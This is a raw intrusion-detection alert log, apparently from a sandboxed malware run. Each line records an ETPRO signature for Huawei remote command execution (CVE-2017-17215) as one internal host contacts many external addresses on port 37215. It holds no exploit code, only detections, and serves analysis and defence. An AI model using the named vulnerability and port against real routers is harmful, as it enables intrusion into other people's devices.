                                                        06/13/24-21:32:07.417303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004437215192.168.2.14197.215.126.123
                                                        06/13/24-21:32:42.423709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778237215192.168.2.14156.189.244.249
                                                        06/13/24-21:32:30.078696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305237215192.168.2.14197.26.152.44
                                                        06/13/24-21:33:15.272082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022037215192.168.2.14197.83.158.82
                                                        06/13/24-21:33:11.157583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068437215192.168.2.1441.146.173.240
                                                        06/13/24-21:32:07.402026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043437215192.168.2.14156.57.4.180
                                                        06/13/24-21:33:09.110176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763637215192.168.2.14197.34.183.238
                                                        06/13/24-21:32:05.376476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207637215192.168.2.14156.82.24.164
                                                        06/13/24-21:32:58.824653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812837215192.168.2.14197.11.61.201
                                                        06/13/24-21:32:52.670292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279637215192.168.2.14197.127.246.176
                                                        06/13/24-21:31:57.092025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952037215192.168.2.14156.150.211.67
                                                        06/13/24-21:32:09.456477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666037215192.168.2.1441.64.14.191
                                                        06/13/24-21:33:02.954075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794037215192.168.2.1441.46.59.194
                                                        06/13/24-21:33:17.307175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882437215192.168.2.14197.123.149.146
                                                        06/13/24-21:32:48.569829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587837215192.168.2.1441.207.2.3
                                                        06/13/24-21:32:58.820399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692037215192.168.2.1441.223.218.250
                                                        06/13/24-21:32:03.277570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628037215192.168.2.14156.2.71.33
                                                        06/13/24-21:32:07.419740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679637215192.168.2.14197.129.247.55
                                                        06/13/24-21:32:34.198959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172437215192.168.2.14156.222.245.94
                                                        06/13/24-21:32:36.244019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3813437215192.168.2.1441.34.129.18
                                                        06/13/24-21:32:09.457919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067237215192.168.2.1441.188.81.156
                                                        06/13/24-21:32:05.369294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233837215192.168.2.14197.134.98.6
                                                        06/13/24-21:32:44.480708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331037215192.168.2.14197.63.94.224
                                                        06/13/24-21:32:03.301254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016437215192.168.2.14156.128.127.167
                                                        06/13/24-21:32:32.156383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049237215192.168.2.14156.155.189.206
                                                        06/13/24-21:32:09.439760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409837215192.168.2.14197.197.22.21
                                                        06/13/24-21:32:15.629832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591237215192.168.2.1441.7.8.225
                                                        06/13/24-21:32:28.026608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969237215192.168.2.14197.157.60.57
                                                        06/13/24-21:33:02.912335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440437215192.168.2.14197.171.30.238
                                                        06/13/24-21:32:46.502341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121037215192.168.2.1441.1.107.230
                                                        06/13/24-21:32:34.217933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963037215192.168.2.14197.1.8.174
                                                        06/13/24-21:32:15.632280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568637215192.168.2.1441.123.31.202
                                                        06/13/24-21:33:05.013829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768437215192.168.2.14156.135.133.115
                                                        06/13/24-21:32:25.973096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040637215192.168.2.1441.53.18.24
                                                        06/13/24-21:32:42.405193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295037215192.168.2.1441.134.205.3
                                                        06/13/24-21:32:01.248105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130037215192.168.2.14156.251.37.245
                                                        06/13/24-21:33:04.991222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829637215192.168.2.1441.77.147.215
                                                        06/13/24-21:32:48.554537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720837215192.168.2.14156.70.203.249
                                                        06/13/24-21:33:02.913915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649437215192.168.2.1441.96.214.171
                                                        06/13/24-21:32:17.678607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189437215192.168.2.1441.186.117.180
                                                        06/13/24-21:32:30.077165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244637215192.168.2.14197.248.116.177
                                                        06/13/24-21:32:28.028182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371637215192.168.2.1441.113.32.115
                                                        06/13/24-21:33:13.212974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830837215192.168.2.1441.12.134.29
                                                        06/13/24-21:32:19.749903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5368837215192.168.2.1441.245.156.73
                                                        06/13/24-21:32:21.782947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944237215192.168.2.1441.193.11.201
                                                        06/13/24-21:32:03.306653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381037215192.168.2.1441.0.235.156
                                                        06/13/24-21:32:17.670885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537237215192.168.2.14197.193.74.54
                                                        06/13/24-21:32:05.347232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907037215192.168.2.14197.151.26.167
                                                        06/13/24-21:32:25.997247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468837215192.168.2.1441.32.163.70
                                                        06/13/24-21:32:32.168653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718237215192.168.2.1441.173.59.118
                                                        06/13/24-21:32:28.027456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683837215192.168.2.1441.212.253.188
                                                        06/13/24-21:32:58.842528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732637215192.168.2.14156.48.24.195
                                                        06/13/24-21:32:30.123925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604837215192.168.2.1441.46.95.168
                                                        06/13/24-21:32:01.239090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257437215192.168.2.14156.15.191.127
                                                        06/13/24-21:32:32.151338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690037215192.168.2.14156.153.60.75
                                                        06/13/24-21:32:30.128142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287437215192.168.2.1441.96.135.250
                                                        06/13/24-21:33:07.056296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5911637215192.168.2.1441.48.42.47
                                                        06/13/24-21:32:36.244358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599237215192.168.2.14156.82.51.228
                                                        06/13/24-21:32:44.478035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553637215192.168.2.14156.255.85.213
                                                        06/13/24-21:32:23.931531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422437215192.168.2.14156.32.56.132
                                                        06/13/24-21:32:30.096157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902637215192.168.2.14197.250.202.222
                                                        06/13/24-21:32:03.308656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452637215192.168.2.1441.37.157.17
                                                        06/13/24-21:32:17.697511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672637215192.168.2.14156.72.46.178
                                                        06/13/24-21:32:42.417599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519437215192.168.2.14197.144.164.38
                                                        06/13/24-21:32:56.758278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936037215192.168.2.1441.173.219.110
                                                        06/13/24-21:33:13.211605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270037215192.168.2.14156.26.43.205
                                                        06/13/24-21:32:36.266072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036637215192.168.2.14156.166.215.173
                                                        06/13/24-21:32:32.170166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306237215192.168.2.14156.71.196.63
                                                        06/13/24-21:32:34.195157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613037215192.168.2.14197.1.69.77
                                                        06/13/24-21:32:05.370139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899837215192.168.2.1441.157.34.139
                                                        06/13/24-21:32:32.155826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778037215192.168.2.14197.233.154.172
                                                        06/13/24-21:32:05.368643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343437215192.168.2.14197.233.145.144
                                                        06/13/24-21:32:38.305415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865837215192.168.2.1441.65.129.202
                                                        06/13/24-21:32:09.438975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591237215192.168.2.1441.242.249.181
                                                        06/13/24-21:32:25.972681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278637215192.168.2.14197.193.23.121
                                                        06/13/24-21:32:34.218047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200237215192.168.2.1441.64.132.245
                                                        06/13/24-21:32:44.454337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691037215192.168.2.14197.200.20.153
                                                        06/13/24-21:32:17.702601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388437215192.168.2.14197.118.211.71
                                                        06/13/24-21:32:38.318019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601637215192.168.2.1441.54.73.216
                                                        06/13/24-21:32:09.438234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487237215192.168.2.1441.64.178.141
                                                        06/13/24-21:33:07.038066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822637215192.168.2.14156.110.136.50
                                                        06/13/24-21:33:15.253144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981237215192.168.2.14197.206.103.226
                                                        06/13/24-21:32:01.248161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3522037215192.168.2.14197.64.180.27
                                                        06/13/24-21:33:15.257154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306437215192.168.2.1441.245.1.2
                                                        06/13/24-21:33:04.989071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350037215192.168.2.14156.223.25.200
                                                        06/13/24-21:33:15.274137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376637215192.168.2.1441.93.229.103
                                                        06/13/24-21:32:42.406629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5873237215192.168.2.1441.171.178.125
                                                        06/13/24-21:32:03.307359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864237215192.168.2.14156.57.209.27
                                                        06/13/24-21:32:30.125028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061037215192.168.2.14156.184.32.129
                                                        06/13/24-21:32:40.356406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940437215192.168.2.14156.6.168.207
                                                        06/13/24-21:32:38.323092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025237215192.168.2.14156.84.174.39
                                                        06/13/24-21:32:38.317164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681237215192.168.2.1441.243.66.92
                                                        06/13/24-21:32:23.835140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057637215192.168.2.14156.58.236.133
                                                        06/13/24-21:33:09.102374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352437215192.168.2.14156.240.0.17
                                                        06/13/24-21:32:21.783923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462637215192.168.2.14197.160.43.122
                                                        06/13/24-21:32:38.301740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944437215192.168.2.1441.193.104.185
                                                        06/13/24-21:32:46.510279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720037215192.168.2.1441.225.241.170
                                                        06/13/24-21:32:25.972068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831437215192.168.2.14156.87.43.5
                                                        06/13/24-21:32:09.456601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.14197.209.200.200
                                                        06/13/24-21:32:50.631476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886637215192.168.2.14197.75.138.60
                                                        06/13/24-21:33:09.088106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341037215192.168.2.1441.255.132.255
                                                        06/13/24-21:33:00.889242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462037215192.168.2.1441.253.178.4
                                                        06/13/24-21:32:28.025922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033637215192.168.2.1441.36.168.187
                                                        06/13/24-21:32:25.991779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293637215192.168.2.1441.185.48.195
                                                        06/13/24-21:32:36.246747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373237215192.168.2.1441.185.5.133
                                                        06/13/24-21:32:40.355202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023237215192.168.2.14197.180.16.249
                                                        06/13/24-21:32:09.437328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937837215192.168.2.1441.247.11.66
                                                        06/13/24-21:32:56.757649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057637215192.168.2.1441.150.4.71
                                                        06/13/24-21:33:02.909011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009237215192.168.2.14197.221.179.141
                                                        06/13/24-21:32:40.359338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350237215192.168.2.14156.5.185.183
                                                        06/13/24-21:32:48.552406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559837215192.168.2.14197.91.103.136
                                                        06/13/24-21:32:48.568215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857237215192.168.2.14197.195.118.174
                                                        06/13/24-21:32:38.303401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801037215192.168.2.14156.27.180.192
                                                        06/13/24-21:32:36.243477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335837215192.168.2.1441.75.15.210
                                                        06/13/24-21:33:11.175359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883837215192.168.2.1441.96.59.112
                                                        06/13/24-21:32:42.407444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221637215192.168.2.1441.204.123.133
                                                        06/13/24-21:32:50.611495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956037215192.168.2.1441.218.71.151
                                                        06/13/24-21:32:13.545119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591037215192.168.2.1441.58.243.138
                                                        06/13/24-21:32:56.791647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677037215192.168.2.14197.197.184.25
                                                        06/13/24-21:32:30.091937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535437215192.168.2.14197.208.70.11
                                                        06/13/24-21:32:23.831677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728237215192.168.2.1441.250.124.47
                                                        06/13/24-21:32:40.357748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405037215192.168.2.14197.81.4.196
                                                        06/13/24-21:33:00.886075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694237215192.168.2.14197.40.126.249
                                                        06/13/24-21:32:25.997026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872837215192.168.2.14156.173.83.124
                                                        06/13/24-21:32:21.781805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501837215192.168.2.14156.132.25.192
                                                        06/13/24-21:32:42.403138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741437215192.168.2.14156.71.117.156
                                                        06/13/24-21:32:11.488405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458037215192.168.2.1441.151.217.121
                                                        06/13/24-21:32:17.702567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384637215192.168.2.1441.18.234.231
                                                        06/13/24-21:32:23.834084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021437215192.168.2.14197.85.238.174
                                                        06/13/24-21:32:36.247148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754237215192.168.2.14156.228.38.219
                                                        06/13/24-21:32:52.679292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602437215192.168.2.1441.167.81.69
                                                        06/13/24-21:32:36.262846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536437215192.168.2.14156.56.66.20
                                                        06/13/24-21:33:02.949874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791437215192.168.2.1441.86.130.147
                                                        06/13/24-21:32:23.833840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038637215192.168.2.1441.17.251.190
                                                        06/13/24-21:32:44.452161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753837215192.168.2.14197.47.183.227
                                                        06/13/24-21:32:50.630237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414437215192.168.2.14156.19.170.108
                                                        06/13/24-21:32:54.708427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773837215192.168.2.14156.138.232.15
                                                        06/13/24-21:33:00.885983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361237215192.168.2.1441.183.147.58
                                                        06/13/24-21:33:09.086916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4606437215192.168.2.14197.38.59.246
                                                        06/13/24-21:33:13.212891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235237215192.168.2.1441.136.81.195
                                                        06/13/24-21:33:17.339019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753637215192.168.2.1441.252.66.172
                                                        06/13/24-21:32:38.320941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808637215192.168.2.14197.67.232.95
                                                        06/13/24-21:33:13.214176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538037215192.168.2.1441.247.68.29
                                                        06/13/24-21:32:50.612794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902237215192.168.2.14197.215.58.142
                                                        06/13/24-21:32:32.153497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971037215192.168.2.1441.156.85.235
                                                        06/13/24-21:32:54.708052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597837215192.168.2.14156.41.140.228
                                                        06/13/24-21:32:46.525949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361837215192.168.2.1441.202.63.196
                                                        06/13/24-21:33:09.129889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409037215192.168.2.14197.38.11.15
                                                        06/13/24-21:32:09.438194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862237215192.168.2.1441.183.249.21
                                                        06/13/24-21:33:09.088362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422037215192.168.2.14156.10.87.242
                                                        06/13/24-21:32:17.675208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976837215192.168.2.1441.221.127.180
                                                        06/13/24-21:32:13.568355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801837215192.168.2.14156.232.248.195
                                                        06/13/24-21:32:15.632645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.1441.119.97.240
                                                        06/13/24-21:32:52.670205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589837215192.168.2.14156.170.250.242
                                                        06/13/24-21:32:13.568640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584037215192.168.2.14156.80.60.194
                                                        06/13/24-21:33:00.870971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106837215192.168.2.14197.73.15.141
                                                        06/13/24-21:32:58.844076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309237215192.168.2.14197.91.53.152
                                                        06/13/24-21:33:00.889712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322437215192.168.2.14197.164.95.12
                                                        06/13/24-21:32:32.150649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076837215192.168.2.1441.118.225.132
                                                        06/13/24-21:32:30.100128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079437215192.168.2.14156.177.45.255
                                                        06/13/24-21:32:40.358696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409437215192.168.2.14156.204.177.88
                                                        06/13/24-21:32:25.993736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714637215192.168.2.14197.39.241.77
                                                        06/13/24-21:32:17.674545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390837215192.168.2.14156.181.50.140
                                                        06/13/24-21:32:40.379560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249437215192.168.2.14156.224.161.138
                                                        06/13/24-21:32:32.169708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458037215192.168.2.14156.15.227.128
                                                        06/13/24-21:33:07.059964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451837215192.168.2.1441.53.83.55
                                                        06/13/24-21:32:32.154518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397637215192.168.2.1441.107.80.243
                                                        06/13/24-21:32:25.990431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285637215192.168.2.14156.189.50.98
                                                        06/13/24-21:32:50.613572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372037215192.168.2.14156.47.145.39
                                                        06/13/24-21:32:58.821963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4871837215192.168.2.14156.110.215.179
                                                        06/13/24-21:32:36.247827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4699237215192.168.2.1441.3.108.11
                                                        06/13/24-21:32:34.212945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627837215192.168.2.1441.239.138.77
                                                        06/13/24-21:33:15.271708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721637215192.168.2.14197.101.150.90
                                                        06/13/24-21:32:03.307782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037237215192.168.2.14156.255.127.63
                                                        06/13/24-21:32:54.707331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313237215192.168.2.14197.76.129.125
                                                        06/13/24-21:32:44.475195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060837215192.168.2.1441.194.102.205
                                                        06/13/24-21:32:15.603749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026037215192.168.2.14197.255.14.5
                                                        06/13/24-21:32:42.424003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974037215192.168.2.14197.93.178.159
                                                        06/13/24-21:32:13.564455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421837215192.168.2.1441.124.94.198
                                                        06/13/24-21:32:38.321213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931037215192.168.2.14197.201.177.143
                                                        06/13/24-21:32:42.420592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641437215192.168.2.14156.120.222.235
                                                        06/13/24-21:32:28.043184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411637215192.168.2.14156.71.29.175
                                                        06/13/24-21:32:42.406541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4871437215192.168.2.1441.174.212.207
                                                        06/13/24-21:33:07.055983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361437215192.168.2.1441.209.19.62
                                                        06/13/24-21:33:02.908172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088637215192.168.2.1441.95.42.111
